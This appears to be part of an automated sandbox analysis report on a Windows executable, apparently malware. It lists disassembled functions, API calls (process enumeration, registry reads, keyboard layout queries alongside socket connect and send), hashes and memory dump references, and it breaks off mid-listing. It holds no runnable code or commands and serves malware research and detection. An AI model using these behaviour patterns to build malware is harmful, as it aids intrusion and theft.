                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$AllocateHeap
                                • String ID:
                                • API String ID: 3033488037-0
                                • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 004493BD
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                  • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 2180151492-0
                                • Opcode ID: bc4163984acb67f3763b954a4e60ef5345a244623aad4191208eb1456dde199f
                                • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                • Opcode Fuzzy Hash: bc4163984acb67f3763b954a4e60ef5345a244623aad4191208eb1456dde199f
                                • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                • __alloca_probe_16.LIBCMT ref: 004511B1
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                • __freea.LIBCMT ref: 0045121D
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID:
                                • API String ID: 313313983-0
                                • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004126DB Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 93sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                • Sleep.KERNEL32(00000BB8), ref: 0041277A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQuerySleepValue
                                • String ID: 8SG$Pj$exepath$hdF
                                • API String ID: 4119054056-3027924918
                                • Opcode ID: f139d5e477cdb60a528e167e6d25b30f1ef806968f795a647c61579ea777c612
                                • Instruction ID: f3cf03c5a64ef847c6da3637c810c9cb64e8e240b2c65477c235684d5dc29c85
                                • Opcode Fuzzy Hash: f139d5e477cdb60a528e167e6d25b30f1ef806968f795a647c61579ea777c612
                                • Instruction Fuzzy Hash: B52148A0B0030427DA00B7366D46EBF724E8B84318F40443FB916E72D3EEBC9C48426D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                • _free.LIBCMT ref: 0044F3BF
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                • _free.LIBCMT ref: 004482D3
                                • _free.LIBCMT ref: 004482FA
                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpen$FileImageName
                                • String ID:
                                • API String ID: 2951400881-0
                                • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 004509D4
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 004509E6
                                • _free.LIBCMT ref: 004509F8
                                • _free.LIBCMT ref: 00450A0A
                                • _free.LIBCMT ref: 00450A1C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                • _strpbrk.LIBCMT ref: 0044E738
                                • _free.LIBCMT ref: 0044E855
                                  • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                  • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                  • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                • String ID: *?$.
                                • API String ID: 2812119850-3972193922
                                • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                Download Yara Rule
                                APIs
                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                • String ID: XQG$NG$PG
                                • API String ID: 1634807452-3565412412
                                • Opcode ID: 7fec138d1ea144a01b832ffa58038a5188fed84c46b8d22641351aaff7b95043
                                • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                • Opcode Fuzzy Hash: 7fec138d1ea144a01b832ffa58038a5188fed84c46b8d22641351aaff7b95043
                                • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                Download Yara Rule
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: `#D$`#D
                                • API String ID: 885266447-2450397995
                                • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000104), ref: 00443475
                                • _free.LIBCMT ref: 00443540
                                • _free.LIBCMT ref: 0044354A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                                • API String ID: 2506810119-3649680502
                                • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
